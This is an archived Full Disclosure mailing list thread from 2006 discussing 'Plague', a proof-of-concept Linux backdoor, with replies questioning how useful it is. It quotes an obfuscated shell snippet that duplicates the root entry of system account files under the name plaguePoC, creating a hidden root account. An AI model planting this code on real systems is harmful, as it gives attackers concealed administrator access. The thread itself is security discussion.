Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Plague Proof of Concept Linux backdoor
From: <cdejrhymeswithgay () hush com>
Date: Sun, 22 Oct 2006 17:24:11 -0500

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



On Sun, 22 Oct 2006 06:29:35 -0500 hijacker () oldum net wrote:
even if they have ssh access, there is still nothing they can do,
except
to create two files in there $HOME directories containing
expressions from
paths.h and sysexits.h ?

Why would that be considered a backdoor?

Regards,
-Nikolay Kichukov


On 10/22/06, J. Oquendo <sil () infiltrated net> wrote:

Plague is an odd proof of concept backdoor keeping
tool based on the premise of using existing system
files and commands to keep and maintain a backdoor
on Linux systems. I could have modified this for
BSD, Solaris, etc., but I didn't feel like doing
the work...

http://www.infiltrated.net/plague


(from the link)

if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}'
/usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

--------------------------------

So this backdoor wouldnt work remotely, correct? You would need
to add
the user to the people allowed to ssh in, and poke a hole for
ssh in
the firewall./?

-JP

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

You said "there" when it should be "their."
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkU774sACgkQsGS6s78KOsX/dwP/YYZ+8XEB8KftGfWAxk2K0HT5HC4h
32eKy54hDbpjklVxZnjaAKrm6kNLkKfNMITDfOb+2+QLbWRAV6oPytZxuZQj0zg8Ky2w
Xzk0hx0hZN5PsuGxESKLBTOLIkg9tsVDMDkPlc4eqyzewqbJgIXbcXw2UyV03welX7Ty
HI1y+dw=
=lSSF
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault